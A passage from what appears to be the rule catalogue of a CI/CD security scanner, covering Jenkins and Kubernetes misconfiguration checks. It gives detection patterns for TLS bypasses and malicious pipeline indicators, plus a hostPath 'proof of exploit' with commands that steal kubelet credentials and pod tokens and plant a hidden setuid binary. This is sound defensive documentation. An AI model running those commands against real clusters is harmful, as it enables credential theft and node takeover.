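The match-plus-exemption logic can be sketched as two patterns; both names are illustrative, and the real DEP_UPDATE_RE allowlist may differ:

```python
import re

# Update commands that bypass lockfile pins.
UPDATE_RE = re.compile(
    r"\b(?:pip install --upgrade|npm update|yarn upgrade|"
    r"bundle update|cargo update|go get -u|composer update)\b"
)
# Tooling-bootstrap exemption (pip upgrading pip itself, etc.).
TOOLING_ALLOW = re.compile(
    r"pip install --upgrade\s+(?:pip|setuptools|wheel|virtualenv)\b"
)

def bypasses_lockfile(cmd: str) -> bool:
    return bool(UPDATE_RE.search(cmd)) and not TOOLING_ALLOW.search(cmd)
```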

Recommendation. Remove dependency-update commands from CI. Use lockfile-pinned install commands (npm ci, pip install -r requirements.txt) and update dependencies via a dedicated PR pipeline (e.g. Dependabot, Renovate).

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Common build-tool bootstrapping idioms (pip install --upgrade pip, pip install --upgrade setuptools wheel virtualenv) and security-tool installs (pip install --upgrade pip-audit / cyclonedx-bom / semgrep) are exempted by the DEP_UPDATE_RE tooling allowlist. Other tooling-upgrade idioms not yet on the list can still trip the rule. Defaults to MEDIUM confidence so CI gates can require --min-confidence HIGH to ignore.

Source: JF-022 in the Jenkins provider.

JF-023: TLS / certificate verification bypass HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.
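Most of the patterns above reduce to a substring scan; this sketch is illustrative and deliberately handles curl -k separately so the bare letter k can't match inside a URL:

```python
# Verification-bypass fragments from the list above.
TLS_BYPASS = (
    "http.sslVerify false",
    "NODE_TLS_REJECT_UNAUTHORIZED=0",
    "strict-ssl false",
    "--no-check-certificate",
    "PYTHONHTTPSVERIFY=0",
)

def disables_tls(line: str) -> bool:
    if any(pattern in line for pattern in TLS_BYPASS):
        return True
    # curl -k as a standalone flag, checked separately.
    return line.startswith("curl ") and " -k " in line
```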

Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: JF-023 in the Jenkins provider.

JF-024: input approval step missing submitter restriction MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. JF-005 already flags deploy stages with no input step. This rule catches the subtler case: the gate exists, but it doesn't actually restrict approvers. submitter accepts a comma-separated list of Jenkins usernames and group names; scope it to the smallest release-eligible pool.

Recommendation. Add a submitter: 'releasers,sre' (or a single role) argument to every input step in a deploy-like stage. Without it, any user with the Jenkins job Build permission can approve a production promotion; the approval gate becomes advisory.

Source: JF-024 in the Jenkins provider.

JF-025: Kubernetes agent pod template runs privileged or mounts hostPath HIGH

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. JF-017 flags inline docker run commands. This rule targets the other privileged-mode entry point: Jenkins' Kubernetes plugin lets pipelines declare agent { kubernetes { yaml '''...''' } }. A pod running with privileged: true or mounting hostPath: / gives the build container the same blast radius: container escape, node-credential theft, and cross-tenant contamination on a shared cluster.

Recommendation. Remove privileged: true from the embedded pod YAML, drop hostPath/hostNetwork/hostPID/hostIPC entries, and add a securityContext with runAsNonRoot: true and a readOnlyRootFilesystem. If Docker-in-Docker is genuinely required, use a rootless daemon (e.g. sysbox) or run the build on a dedicated privileged pool with stricter branch protection.

Source: JF-025 in the Jenkins provider.

JF-026: build job: trigger ignores downstream failure MEDIUM

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. The Jenkins Pipeline plugin defaults wait to true and propagate to true, but either can be flipped per call. wait: false returns immediately; propagate: false continues even when the downstream job fails or is aborted. Both patterns sever the flow-control link between the upstream approval gate and the work the downstream job is about to do.

Recommendation. Remove wait: false and propagate: false from every build job: step, or replace them with an explicit currentBuild.result = build(...).result check. A fire-and-forget trigger can silently ship broken artifacts because the upstream job reports success regardless of what the downstream job actually did.

Source: JF-026 in the Jenkins provider.

JF-027: archiveArtifacts does not record a fingerprint LOW

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Fingerprinting hashes the artifact on archive so Jenkins can trace its flow between jobs, the same mechanism JF-013 relies on for verification-step pairing. It's cheap and retroactive: enabling it on the producer job unlocks a build-traceability audit for every downstream consumer.

Recommendation. Set fingerprint: true on every archiveArtifacts call (or use archiveArtifacts artifacts: '...', fingerprint: true). Without it, Jenkins can't link the artifact to the build that produced it; copyArtifacts consumers downstream then have no provenance to verify against.

Source: JF-027 in the Jenkins provider.

JF-028: No SLSA provenance attestation produced MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. cosign sign signs the artifact bytes. cosign attest signs an in-toto statement describing how the build ran: builder, source commit, input parameters. SLSA L3 verifiers check the latter so consumers can enforce policy on where and how artifacts were produced.

Recommendation. Add a sh 'cosign attest --predicate=provenance.intoto.jsonl …' step after the build, or integrate the TestifySec witness run attestor. JF-006 covers signing; this rule covers the build-provenance statement SLSA Build L3 requires.

Source: JF-028 in the Jenkins provider.

JF-029: Jenkinsfile contains indicators of malicious activity CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution, CICD-SEC-7 Insecure System Configuration.

How this is detected. Distinct from JF-016 (curl pipe) and JF-019 (Groovy sandbox escape). Those flag risky defaults; this flags concrete evidence: reverse shells, base64-decoded execution, miner binaries, exfil channels, credential-dump pipes, shell-history erasure. Runs on the comment-stripped Groovy text, so comments like // cosign verify … or // webhook.site in a legitimate annotation don't false-positive.

Recommendation. Treat as a potential compromise. Identify the commit that introduced the matching stage(s), rotate Jenkins credentials the job can reach, review controller/agent audit logs for outbound traffic to the matched hosts, and re-image the agent pool if the compromise may have persisted.

Known false positives.

  • Security-training repositories, CTF challenges, and red-team exercise pipelines legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain example, fixture, sample, demo, or test are auto-suppressed; bare lines in a production pipeline still fire.
  • Defaults to LOW confidence. Filter with --min-confidence MEDIUM to ignore all matches; the rule still surfaces the hit for teams that want to spot-check.

Source: JF-029 in the Jenkins provider.

JF-030: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Complements JF-002 (script injection from untrusted build parameters). Fires on intrinsically risky shell idioms (eval, sh -c "$X", backtick exec) regardless of whether the input source is currently trusted.
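A coarse sketch of the first two idioms (the backtick form is omitted here); the pattern is illustrative, not the provider's actual rule:

```python
import re

# eval or sh -c applied to a variable expansion. `eval "$(ssh-agent -s)"`
# escapes the pattern because `$(` opens a command substitution, not a
# variable reference, which matches the carve-out described below.
RISKY_IDIOM = re.compile(r'\beval\s+"?\$\{?[A-Z_]|\bsh\s+-c\s+"\$')

def risky_shell_idiom(line: str) -> bool:
    return bool(RISKY_IDIOM.search(line))
```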

Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec with direct command invocation. Validate any value feeding a dynamic command at the boundary, or pass arguments as a list to a real sh step so the shell is not re-invoked.

Known false positives.

  • sh 'eval "$(ssh-agent -s)"' and similar eval "$(<literal-tool>)" bootstrap idioms are intentionally NOT flagged; the substituted command is literal, and only its output is eval'd.

Source: JF-030 in the Jenkins provider.

JF-031: Package install bypasses registry integrity (git / path / tarball source) MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Complements JF-021 (missing lockfile flag). Git URL installs without a commit pin, local-path installs, and direct tarball URLs bypass the registry integrity controls the lockfile relies on.

Recommendation. Pin git dependencies to a commit SHA. Publish private packages to an internal registry (Artifactory, Nexus) instead of installing from a filesystem path or tarball URL.

Source: JF-031 in the Jenkins provider.

JF-032: Agent label interpolates attacker-controllable value HIGH 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. JF-014 catches agent labels that aren't ephemeral; this rule catches the upstream targeting choice. When label inside an agent { ... } block is computed from a build parameter or an SCM-controlled environment variable, whoever queues the build (or pushes the branch / opens the PR) picks which agent the job lands on, including any privileged label the controller exposes. Two attacker surfaces are flagged: untrusted env.* refs (BRANCH_NAME, CHANGE_BRANCH, TAG_NAME, …) and params.X references (caller-controlled at trigger time). The rule walks all four agent { ... } shapes: direct label, the node { label … } form, and docker { label … } / dockerfile { label … }, via a brace-balanced scan so nested DSL blocks parse correctly.
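The untrusted-reference match can be sketched in one pattern; this only inspects a single label expression and skips the brace-balanced block walk, so it is illustrative only:

```python
import re

# Caller-controlled refs: any params.X, plus the SCM-controlled env vars
# named above. Author-controlled refs like env.BUILD_NUMBER don't match.
UNTRUSTED_REF = re.compile(
    r"\$\{(?:params\.\w+|env\.(?:BRANCH_NAME|CHANGE_BRANCH|TAG_NAME))\}"
)

def label_is_attacker_controlled(label_expr: str) -> bool:
    return bool(UNTRUSTED_REF.search(label_expr))
```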

Recommendation. Hard-code agent labels to a specific pool name. If label selection has to be parameterised, validate the candidate value against an explicit allowlist before the build starts (Groovy if guard at the top of the pipeline), and never inline ${params.X} / ${env.BRANCH_NAME} / ${env.CHANGE_BRANCH} directly into label "...".

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Author-controlled environment refs like ${env.JOB_NAME} or ${env.BUILD_NUMBER} are intentionally not flagged, those values come from Jenkins itself, not from the triggerer. Pipelines that intentionally select agents via a vetted parameter and gate the assignment behind a Groovy validator should suppress with .pipelinecheckignore and a rationale rather than disable the rule everywhere.

Source: JF-032 in the Jenkins provider.

K8S-001: Container image not pinned by sha256 digest HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Reuses _primitives.image_pinning.classify so the floating-tag semantics match DF-001 / GL-001 / JF-009 / ADO-009 / CC-003. Even a PINNED_TAG like nginx:1.25.4 is treated as unpinned; only an explicit @sha256: survives, since a tag is mutable on the registry side and Kubernetes will happily pull the new content on a node restart.
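The pinned/unpinned split reduces to one test; `is_pinned` here is a stand-in sketch, not the scanner's _primitives.image_pinning.classify:

```python
import re

# Only an explicit digest survives; every tag form (pinned or floating)
# is mutable on the registry side.
DIGEST_RE = re.compile(r"@sha256:[0-9a-f]{64}$")

def is_pinned(image_ref: str) -> bool:
    return bool(DIGEST_RE.search(image_ref))
```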

Recommendation. Resolve every workload container image to its current digest (crane digest <ref> or docker buildx imagetools inspect) and pin via image: repo@sha256:<digest>. Floating tags (:latest, :3, no tag) silently swap the running image on the next rollout, breaking provenance and reproducibility.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: K8S-001 in the Kubernetes provider.

K8S-002: Pod hostNetwork: true HIGH 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Compromised containers on hostNetwork can sniff or interfere with traffic from every other pod on the node. Reserve the flag for system DaemonSets that genuinely require it (CNI agents, ingress data planes); applications never need it.

Recommendation. Set spec.hostNetwork: false (the default) on every workload. hostNetwork: true puts the pod directly on the node's network namespace, exposing every host-bound listener to the container and bypassing CNI network policies.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: K8S-002 in the Kubernetes provider.

K8S-003: Pod hostPID: true HIGH 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. There is no application use case for hostPID. Only specialised node agents (process exporters, debuggers) legitimately need it, and those are typically deployed via a system DaemonSet with an explicit security review.

Recommendation. Set spec.hostPID: false (the default) on every workload. hostPID: true makes every host process visible inside the container, and combined with privileged execution allows trivial escape via nsenter / /proc/<pid>/root.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: K8S-003 in the Kubernetes provider.

K8S-004: Pod hostIPC: true HIGH 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Modern applications coordinate via gRPC / sockets, never via host IPC. Treat this flag as a strong red flag in code review unless paired with a documented system-level use case.

Recommendation. Set spec.hostIPC: false (the default) on every workload. hostIPC: true lets the container read and write the host's shared-memory segments and POSIX message queues, exposing data exchanged by every other process on the node.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: K8S-004 in the Kubernetes provider.

K8S-005: Container securityContext.privileged: true CRITICAL 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. privileged: true is the strongest possible escalation in Kubernetes. It overrides every other securityContext setting and is the single largest cluster-takeover vector after RBAC misconfiguration.

Recommendation. Remove securityContext.privileged: true from every container. A privileged container has full access to the host's devices and capabilities; escape to the node is trivial. If the workload genuinely needs a kernel capability, grant only that capability via capabilities.add rather than enabling privileged mode.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: K8S-005 in the Kubernetes provider.

K8S-006: Container allowPrivilegeEscalation not explicitly false HIGH 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. The default for non-root containers is true (the Pod Security Standards 'baseline' profile allows this; 'restricted' does not). An explicit false is required because Kubernetes treats an unset field as a deferral to the cluster admission controller, which may not enforce restricted.

Recommendation. Set securityContext.allowPrivilegeEscalation: false on every container. The Linux no_new_privs flag stops setuid binaries and capabilities from granting elevated privileges; without it, a compromised process can escalate via setuid utilities still installed in many base images.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: K8S-006 in the Kubernetes provider.

K8S-007: Container runAsNonRoot not true / runAsUser is 0 HIGH 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. A container is considered safe when EITHER its own securityContext OR the pod-level securityContext sets runAsNonRoot: true and a non-zero runAsUser. An explicit runAsUser: 0 always fails, even if runAsNonRoot is unset.
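The either/or merge can be sketched as a dict overlay: container-level fields override pod-level ones, and an explicit UID 0 always fails. The helper name is illustrative:

```python
# Container securityContext wins over pod-level; an unset runAsUser
# also fails because the rule requires a non-zero UID to be declared.
def runs_as_nonroot(pod_sc: dict, container_sc: dict) -> bool:
    merged = {**(pod_sc or {}), **(container_sc or {})}
    if merged.get("runAsUser") == 0:
        return False                    # explicit root UID always fails
    return merged.get("runAsNonRoot") is True and bool(merged.get("runAsUser"))
```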

Recommendation. Set securityContext.runAsNonRoot: true and runAsUser: <non-zero UID> on every container, OR set the same fields at pod level so all containers inherit. Running as UID 0 inside a container makes container-escape exploits dramatically more dangerous: the attacker already has root inside the container, so any kernel CVE that matters becomes immediately exploitable.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: K8S-007 in the Kubernetes provider.

K8S-008: Container readOnlyRootFilesystem not true MEDIUM 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Many post-exploitation toolchains (cryptominers, persistence implants, shell callbacks) assume a writable root filesystem. Locking it down denies them anywhere to land a payload beyond the tmpfs mounts the manifest explicitly declares.

Recommendation. Set securityContext.readOnlyRootFilesystem: true on every container. A read-only root filesystem stops attackers from dropping additional payloads into /tmp, /var, or writable system paths. Mount tmpfs emptyDir volumes for the directories the application genuinely needs to write to.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: K8S-008 in the Kubernetes provider.

K8S-009: Container capabilities not dropping ALL / adding dangerous caps HIGH

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Fails when the container does NOT drop ALL or when capabilities.add includes any of: SYS_ADMIN, NET_ADMIN, SYS_PTRACE, SYS_MODULE, DAC_READ_SEARCH, DAC_OVERRIDE, SYS_RAWIO, SYS_BOOT, BPF, PERFMON, or the literal ALL.

Recommendation. Drop every capability and add back only what the workload actually needs:

securityContext:
  capabilities:
    drop: ["ALL"]
    add: ["NET_BIND_SERVICE"]   # only if binding <1024

Most stateless services need no capabilities at all. Avoid SYS_ADMIN (effectively root), SYS_PTRACE (process snooping), NET_ADMIN (raw socket access), and SYS_MODULE (kernel module loading).

Source: K8S-009 in the Kubernetes provider.

K8S-010: Container seccompProfile not RuntimeDefault or Localhost MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Pod-level securityContext.seccompProfile covers all containers in the pod. Either path passes this rule. The default of Unconfined (or unset, which inherits the node default, usually Unconfined) fails.

Recommendation. Set securityContext.seccompProfile.type: RuntimeDefault (or Localhost with a path to your tuned profile) at either pod or container level. Without seccomp, every syscall is reachable from the container; modern kernel CVEs (e.g. io_uring) become trivially exploitable.

Source: K8S-010 in the Kubernetes provider.

K8S-011: Pod serviceAccountName unset or 'default' MEDIUM

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. Both an unset serviceAccountName (which defaults to default) and an explicit serviceAccountName: default fail the rule. Pair this with K8S-012 to also disable token auto-mounting where the workload doesn't need API access.

Recommendation. Bind every workload to a dedicated, narrow ServiceAccount. The 'default' SA exists in every namespace and tends to accrete RoleBindings over time; using it gives the workload every privilege any other service in the namespace ever needed. Create a per-workload SA with the minimum RBAC needed and reference it via spec.serviceAccountName.

Source: K8S-011 in the Kubernetes provider.

K8S-012: Pod automountServiceAccountToken not false MEDIUM

Evidences: CICD-SEC-2 Inadequate Identity and Access Management, CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. An unset value defaults to true in Kubernetes. This rule fails on unset because most application workloads do NOT need API access and the default exposes credentials by accident. Workloads that explicitly call the API should set the field to true so the choice is visible in code review.

Recommendation. Set spec.automountServiceAccountToken: false on every workload that doesn't need to talk to the Kubernetes API. Auto-mounted SA tokens are a free credential for an attacker who lands a shell; without explicit opt-out the token sits at /var/run/secrets/kubernetes.io/serviceaccount/token ready to be exfiltrated. If the workload needs API access, leave it true but pair with a tight, dedicated RBAC role.

Source: K8S-012 in the Kubernetes provider.

K8S-013: Pod uses a hostPath volume HIGH 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Some legitimate system DaemonSets need hostPath (log collectors, CSI node plugins). Those should be deployed with explicit security review and a narrowly scoped path; this rule fires regardless, because application workloads should never use hostPath.

Recommendation. Replace hostPath volumes with configMap, secret, emptyDir, persistentVolumeClaim, or CSI volumes. hostPath opens a direct read/write window onto the node's filesystem; combined with even mild container compromise it gives the attacker access to other pods' data, kubelet credentials, and the container runtime.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Seen in the wild.

  • CVE-2021-25741 (Kubernetes subPath symlink escape): a container with hostPath plus subPath could traverse outside the volume boundary and read or modify arbitrary host files. Exploitable on any cluster permitting hostPath to non-system workloads.
  • TeamTNT / Kinsing crypto-jacking campaigns (2020-2022): cluster compromise reports repeatedly traced lateral movement from a single misconfigured pod to the underlying node via hostPath:/, then to kubelet credentials and other tenants. Sysdig and Aqua incident reports document the pattern.

Proof of exploit.

Vulnerable: pod mounts the host's root filesystem.

apiVersion: v1
kind: Pod
metadata:
  name: attacker
spec:
  containers:
    - name: shell
      image: busybox
      command: ["sleep", "infinity"]
      volumeMounts:
        - name: host-root
          mountPath: /host
  volumes:
    - name: host-root
      hostPath:
        path: /   # full node filesystem

Attack from a shell inside the container:

# Read kubelet credentials and pivot to API server:
cat /host/var/lib/kubelet/kubeconfig
cat /host/etc/kubernetes/admin.conf

# Read service account tokens for every other pod on
# the node and impersonate them:
ls /host/var/lib/kubelet/pods/*/volumes/kubernetes.io~projected/*/token

# Drop a setuid binary and pin persistence on the host:
cp /bin/busybox /host/usr/local/bin/.bd
chmod 4755 /host/usr/local/bin/.bd

Safe: use scoped volume types that don't bridge to the host.

spec:
  volumes:
    - name: data
      persistentVolumeClaim:
        claimName: app-data

Source: K8S-013 in the Kubernetes provider.

K8S-014: Pod hostPath references a sensitive host directory CRITICAL

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Stricter than K8S-013: that rule flags any hostPath; this one upgrades to CRITICAL when the path is one of the well-known cluster-escape vectors.

Recommendation. Never mount the container runtime socket (/var/run/docker.sock, containerd.sock, crio.sock), kubelet credentials (/var/lib/kubelet), the cluster config (/etc/kubernetes), the host root (/), or /proc, /sys, /etc into a workload container. Each of these is a one-line cluster takeover. If a container genuinely needs node-level metrics, use an exporter DaemonSet with a narrowly-scoped read-only mount.
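The sensitive-path test reduces to a prefix match; the exact path list below is illustrative, not the rule's actual configuration:

```python
# Cluster-escape prefixes drawn from the recommendation above.
SENSITIVE = (
    "/var/run/docker.sock", "/run/containerd/containerd.sock",
    "/var/lib/kubelet", "/etc/kubernetes", "/proc", "/sys", "/etc",
)

def hostpath_is_critical(path: str) -> bool:
    norm = path.rstrip("/")
    if norm == "":                      # hostPath: / (the host root)
        return True
    return any(norm == p or norm.startswith(p + "/") for p in SENSITIVE)
```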

Source: K8S-014 in the Kubernetes provider.

K8S-015: Container missing resources.limits.memory MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Init containers and ephemeral containers are also checked: a leaking init container holds a slot on the node until it completes and can crowd out other pods just as readily as an application container.

Recommendation. Set resources.limits.memory on every container. Without a memory limit, a leaking or compromised container can consume the node's RAM until the kernel OOM-kills neighbouring pods, taking down workloads that share the node. Pair the limit with a requests.memory to inform the scheduler.

Source: K8S-015 in the Kubernetes provider.

K8S-016: Container missing resources.limits.cpu LOW

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Lower severity than K8S-015 because CPU throttling is self-healing (workloads slow down rather than die) and some controllers (e.g. SchedulerProfile, LimitRange) supply a cluster-default cpu limit transparently.

Recommendation. Set resources.limits.cpu on every container. CPU throttling is the kernel's defense against a neighbour consuming all node cycles, without a limit, a compromised container can stall everything else on the node, including the kubelet. Pair the limit with a requests.cpu for scheduling.

Source: K8S-016 in the Kubernetes provider.

K8S-017: Container env value carries a credential-shaped literal CRITICAL

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Reuses _primitives/secret_shapes: flags AKIA-prefixed AWS access keys outright, plus credential-named keys (API_KEY, DB_PASSWORD, SECRET_TOKEN) when the value is a non-empty literal. valueFrom entries are always safe (no inline value).
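The two triggers can be sketched as follows; pattern and helper names are illustrative, not _primitives/secret_shapes itself:

```python
import re

# AKIA-shaped AWS access key, or a credential-named env key with any
# non-empty inline literal. valueFrom entries have no `value` field.
AKIA_RE = re.compile(r"\bAKIA[0-9A-Z]{16}\b")
CRED_NAME_RE = re.compile(r"API_KEY|PASSWORD|SECRET|TOKEN", re.IGNORECASE)

def env_entry_flagged(entry: dict) -> bool:
    value = entry.get("value")
    if value is None:        # valueFrom entry: no inline literal to leak
        return False
    if AKIA_RE.search(value):
        return True
    return bool(CRED_NAME_RE.search(entry.get("name", ""))) and value != ""
```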

Recommendation. Replace literal env[].value entries that hold credentials with env[].valueFrom.secretKeyRef or envFrom.secretRef. A literal env value lives in the manifest YAML. It gets committed to git, surfaced by kubectl get pod -o yaml, and embedded in audit logs. Externalising into a Secret (and ideally a SealedSecret / ExternalSecret / SOPS-encrypted source) keeps the value out of the manifest.

Source: K8S-017 in the Kubernetes provider.

K8S-018: Secret stringData/data carries a credential-shaped literal CRITICAL

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Walks both stringData (plain text) and data (base64). Base64-encoded values are decoded and checked for AKIA-shaped AWS keys. Credential-shaped key NAMES with any non-empty value are flagged regardless of encoding; even if the value is the literal placeholder REPLACE_ME, having the name in the manifest is a maintenance footgun.
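The stringData/data walk can be sketched like this; the names are illustrative and the real name-shape heuristics are broader:

```python
import base64
import re

# Decode data values before the AKIA shape check; stringData is
# already plain text.
AKIA_RE = re.compile(r"\bAKIA[0-9A-Z]{16}\b")
CRED_NAME_RE = re.compile(r"KEY|PASSWORD|SECRET|TOKEN", re.IGNORECASE)

def secret_flagged(manifest: dict) -> bool:
    items = dict(manifest.get("stringData") or {})
    for name, encoded in (manifest.get("data") or {}).items():
        items[name] = base64.b64decode(encoded).decode("utf-8", "replace")
    return any(
        value and (AKIA_RE.search(value) or CRED_NAME_RE.search(name))
        for name, value in items.items()
    )
```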

Recommendation. A Kind: Secret manifest committed to git defeats every secret-management story Kubernetes claims to provide: the base64 encoding in data is not encryption. Replace with SealedSecrets (Bitnami), ExternalSecrets / ESO, SOPS-encrypted manifests, or HashiCorp Vault Agent injection. If the manifest must remain in git, the only acceptable contents are placeholders that are filled in by an operator at apply time.

Source: K8S-018 in the Kubernetes provider.

K8S-019: Workload deployed in the 'default' namespace LOW

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. Severity is LOW because in a well-curated cluster the default namespace is empty by policy. If your cluster treats default as a sandbox you can suppress this rule via .pipelinecheckignore.

Recommendation. Set metadata.namespace to a dedicated namespace per workload (or per environment). The default namespace tends to accumulate cluster-wide RoleBindings, NetworkPolicies, and operators that grant broader access than intended; placing application workloads there means every privilege grant in default applies to them. A purpose-built namespace also lets you enforce Pod Security Standards (pod-security.kubernetes.io/enforce label) scoped to that workload.

Source: K8S-019 in the Kubernetes provider.

K8S-020: ClusterRoleBinding grants cluster-admin or system:masters CRITICAL 🔧 fix

Evidences: CICD-SEC-2 Inadequate Identity and Access Management, CICD-SEC-5 Insufficient PBAC.

How this is detected. The rule fires on a ClusterRoleBinding whose roleRef.name is cluster-admin, admin, or system:masters. Subject type does not matter; even binding cluster-admin to a Group is a cluster-takeover risk.

Recommendation. Replace cluster-admin / system:masters bindings with narrowly-scoped ClusterRoles or namespace-scoped Roles. Granting cluster-admin to a service account is equivalent to giving every pod that uses it root on every node; credential theft from any such pod becomes immediate cluster takeover. Audit-log every existing cluster-admin binding and replace each with the minimum verbs/resources the consumer actually needs.
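One possible shape of the replacement, assuming a hypothetical CI deployer that only patches Deployments in one namespace (all names are illustrative):

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: deployer
  namespace: app-prod
rules:
  - apiGroups: ["apps"]
    resources: ["deployments"]
    verbs: ["get", "list", "patch"]   # only what the consumer needs
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding                     # namespace-scoped, not a ClusterRoleBinding
metadata:
  name: deployer-binding
  namespace: app-prod
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: deployer
subjects:
  - kind: ServiceAccount
    name: ci-deployer
    namespace: app-prod
```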

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Seen in the wild.

  • Tesla Kubernetes dashboard compromise (RedLock, 2018): an unauthenticated Kubernetes dashboard exposed to the internet held tokens for service accounts bound to cluster-admin. Attackers used the dashboard credentials to deploy crypto-mining workloads with full cluster access. Least-privilege RBAC would have capped the blast radius even after dashboard exposure.
  • Argo CD CVE-2022-24348 / CVE-2022-24768 chain (2022): directory traversal plus a default cluster-admin install let any project member exfiltrate cluster-wide secrets. Argo's recommendation post-fix was to scope the controller's RBAC away from cluster-admin so a similar future bug couldn't escalate the same way.

Source: K8S-020 in the Kubernetes provider.

K8S-021: Role or ClusterRole grants wildcard verbs+resources HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management, CICD-SEC-5 Insufficient PBAC.

How this is detected. Fires on any rule entry where BOTH verbs and resources contain a literal "*". A wildcard in only one of the two is still risky but is often a legitimate read-everything pattern (e.g. monitoring); this rule targets the strict superset 'do anything to everything'.

Recommendation. Replace verbs: ["*"] and resources: ["*"] with explicit lists. Wildcards bypass the principle of least privilege: today they grant read pods and tomorrow they grant delete crds because a new resource was registered in that apiGroup. Explicit verbs (get, list, watch) and explicit resources (configmaps, services) keep grants stable across cluster upgrades.
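A before/after sketch of the rules: entry (resource names are illustrative):

```yaml
# Fails K8S-021: wildcard verbs AND wildcard resources
rules:
  - apiGroups: ["*"]
    resources: ["*"]
    verbs: ["*"]

# Passes: explicit grants that stay stable across cluster upgrades
rules:
  - apiGroups: [""]
    resources: ["configmaps", "services"]
    verbs: ["get", "list", "watch"]
```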

Source: K8S-021 in the Kubernetes provider.

K8S-022: Service exposes SSH (port 22) MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Mirrors DF-013 (EXPOSE 22 in a Dockerfile) at the Service level. The check fires on Service ports whose port or targetPort is 22, regardless of Service type: a NodePort/LoadBalancer 22 is dramatically worse, but a ClusterIP 22 still indicates an sshd container somewhere.

Recommendation. Containers should not run sshd. If you need an interactive shell into a running pod, use kubectl exec (subject to RBAC) or kubectl debug. Removing the port-22 Service removes a pre-auth network surface that's a frequent lateral-movement target after initial cluster compromise.

Source: K8S-022 in the Kubernetes provider.

K8S-023: Namespace missing Pod Security Admission enforcement label HIGH

